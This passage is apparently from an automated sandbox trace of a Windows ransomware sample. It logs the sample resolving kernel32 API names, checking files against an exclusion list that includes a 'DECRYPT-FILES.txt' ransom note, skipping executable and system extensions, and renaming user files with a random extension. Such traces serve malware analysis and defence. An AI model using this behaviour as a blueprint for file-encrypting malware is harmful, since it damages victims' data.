(lpString="CREATEFILETRANSACTEDW") returned 21 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.372] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.372] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.372] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.372] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.372] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.372] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.372] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.372] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.372] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.372] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.372] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.372] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.372] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.372] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.372] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.373] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.373] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.373] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.373] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.373] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.373] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.373] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.373] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.373] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.373] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.373] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.373] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.373] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.373] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.373] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.373] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.373] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.373] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.373] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.374] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.374] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.374] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.374] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.374] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.374] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.374] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.374] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.374] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.374] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.374] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.374] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.374] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.374] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.374] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.374] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.374] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.374] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.374] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.374] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.375] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.375] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.375] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.375] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.375] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.375] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.375] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.375] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.375] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.375] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.375] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.375] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.375] lstrlenA (lpString="DELETEATOM") returned 10 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.375] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.375] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.375] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.375] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.375] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.375] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.376] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.376] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.376] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.376] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.376] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.376] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.376] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.376] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.376] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.376] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.376] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.376] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.376] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.376] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.376] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.376] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.376] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.376] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.376] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.376] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.377] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.377] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.377] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.377] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.377] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.377] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.377] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.377] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.377] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.377] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.377] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.377] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.377] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.377] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.377] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.377] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.377] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.378] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.378] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\PeC6-0DE.swf") returned 58 [0082.378] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\PeC6-0DE.swf.CkPJtV3") returned 66 [0082.378] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\PeC6-0DE.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pec6-0de.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\PeC6-0DE.swf.CkPJtV3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pec6-0de.swf.ckpjtv3"), dwFlags=0x0) returned 1 [0082.378] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.379] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.379] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.379] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1741a3f0, ftCreationTime.dwHighDateTime=0x1d4cb35, ftLastAccessTime.dwLowDateTime=0x6038e5f0, ftLastAccessTime.dwHighDateTime=0x1d4c5ae, ftLastWriteTime.dwLowDateTime=0x6038e5f0, ftLastWriteTime.dwHighDateTime=0x1d4c5ae, nFileSizeHigh=0x0, nFileSizeLow=0x3562, dwReserved0=0x0, dwReserved1=0x0, cFileName="QD1ysnsO4kVGu.png", cAlternateFileName="QD1YSN~1.PNG")) returned 1 [0082.379] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png", lpString2="DECRYPT-FILES.txt") returned 1 [0082.379] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png", lpString2="autorun.inf") returned 1 [0082.379] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png", lpString2="boot.ini") returned 1 [0082.379] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png", lpString2="desktop.ini") returned 1 [0082.379] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png", lpString2="ntuser.dat") returned 1 [0082.379] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png", lpString2="iconcache.db") returned 1 [0082.379] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png", lpString2="bootsect.bak") returned 1 [0082.379] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png", lpString2="ntuser.dat.log") returned 1 [0082.379] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png", lpString2="thumbs.db") returned -1 [0082.379] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png", lpString2="Bootfont.bin") returned 1 [0082.379] lstrlenW (lpString="QD1ysnsO4kVGu.png") returned 17 [0082.379] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0082.379] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0082.379] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0082.380] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0082.380] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.380] lstrlenW (lpString="QD1ysnsO4kVGu.png") returned 17 [0082.380] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.380] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="QD1ysnsO4kVGu.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QD1ysnsO4kVGu.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QD1ysnsO4kVGu.png" [0082.380] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 